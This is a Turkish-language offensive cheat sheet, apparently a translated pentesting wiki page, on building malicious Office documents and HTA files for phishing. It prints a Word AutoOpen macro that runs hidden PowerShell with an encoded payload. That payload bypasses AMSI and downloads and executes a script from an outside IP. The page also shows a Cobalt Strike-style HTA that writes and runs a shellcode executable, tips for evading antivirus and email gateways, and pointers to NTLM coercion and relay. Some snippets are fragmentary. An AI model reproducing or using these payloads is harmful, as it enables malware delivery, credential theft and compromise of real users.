Ofis Belgeleri

Microsoft Word, bir dosyayı açmadan önce dosya veri doğrulaması yapar. Veri doğrulaması, OfficeOpenXML standardına karşı veri yapısı tanımlaması şeklinde gerçekleştirilir. Veri yapısı tanımlaması sırasında herhangi bir hata oluşursa, analiz edilen dosya açılmaz.

Genellikle, makro içeren Word dosyaları .docm uzantısını kullanır. Ancak, dosya uzantısını değiştirerek dosyayı yeniden adlandırarak makro yürütme yeteneklerini korumak mümkündür. Örneğin, RTF dosyası, tasarım gereği makroları desteklemez, ancak RTF olarak yeniden adlandırılmış bir DOCM dosyası Microsoft Word tarafından işlenecek ve makro yürütme yeteneğine sahip olacaktır. Aynı iç yapı ve mekanizmalar, Microsoft Office Suite'in tüm yazılımlarına (Excel, PowerPoint vb.) uygulanır.

Bazı Ofis programları tarafından yürütülecek uzantıları kontrol etmek için aşağıdaki komutu kullanabilirsiniz:

assoc | findstr /i "word excel powerp"

Harici Görüntü Yükleme

Git: Ekle --> Hızlı Parçalar --> Alan Kategoriler: Bağlantılar ve Referanslar, Alan adları: includePicture, ve Dosya adı veya URL: http://<ip>/nebilirim

Macros Arka Kapı

Belgeden makroları "yürütmek" için uzaktan şablonu referans alan DOCX dosyaları (Dosya – Seçenekler – Eklentiler – Yönet: Şablonlar – Git) aynı şekilde makroları "yürütebilir".

Otomatik Yükleme Fonksiyonları

Ne kadar yaygınsa, AV'nin onları tespit etme olasılığı o kadar yüksektir.

• AutoOpen()

• Document_Open()

Makro Kod Örnekleri

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Meta verilerini manuel olarak kaldırma

Dosya > Bilgi > Belgeyi İncele > Belgeyi İncele'ye gidin, bu Belge Denetleyicisini açacaktır. İncele'ye tıklayın ve sonra Belge Özellikleri ve Kişisel Bilgiler yanındaki Tümünü Kaldır'a tıklayın.

Belge Uzantısı

Tamamlandığında, Farklı Kaydet türü açılır menüsünden, formatı .docx'den Word 97-2003 .doc'e değiştirin. Bunu yapın çünkü makroları .docx içine kaydedemezsiniz ve makro destekli .docm uzantısı etrafında bir önyargı var (örneğin küçük resim simgesinde büyük bir ! işareti var ve bazı web/e-posta geçitleri bunları tamamen engeller). Bu nedenle, bu eski .doc uzantısı en iyi uzlaşmadır.

Zararlı Makro Oluşturucuları

• MacOS

• macphish

• Mythic Macro Generator

HTA Dosyaları

Bir HTA, HTML ve VBScript ve JScript gibi betik dillerini birleştiren bir Windows programıdır. Kullanıcı arayüzünü oluşturur ve bir tarayıcının güvenlik modelinin kısıtlamaları olmadan "tamamen güvenilir" bir uygulama olarak çalıştırılır.

Bir HTA, genellikle Internet Explorer ile birlikte yüklenen mshta.exe kullanılarak yürütülür, bu da mshta'nın IE'ye bağlı olduğu anlamına gelir. Bu nedenle, IE kaldırılmışsa, HTA'lar yürütülemez olacaktır.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

NTLM Kimlik Doğrulamasını Zorlamak

NTLM kimlik doğrulamasını "uzaktan" zorlamak için birkaç yol bulunmaktadır, örneğin, kullanıcı erişeceği görünmez resimler veya HTML içine ekleyebilirsiniz (hatta HTTP MitM?). Veya kurbanı, sadece klasörü açmak için kimlik doğrulamasını tetikleyecek dosyaların adresini gönderebilirsiniz.

Bu fikirleri ve daha fazlasını aşağıdaki sayfalarda kontrol edin:

NTLM Aktarımı

Unutmayın, sadece hash'i veya kimlik doğrulamayı çalmakla kalmayıp aynı zamanda NTLM aktarım saldırıları da gerçekleştirebilirsiniz:

• NTLM Aktarım Saldırıları

• AD CS ESC8 (NTLM aktarımı sertifikalara)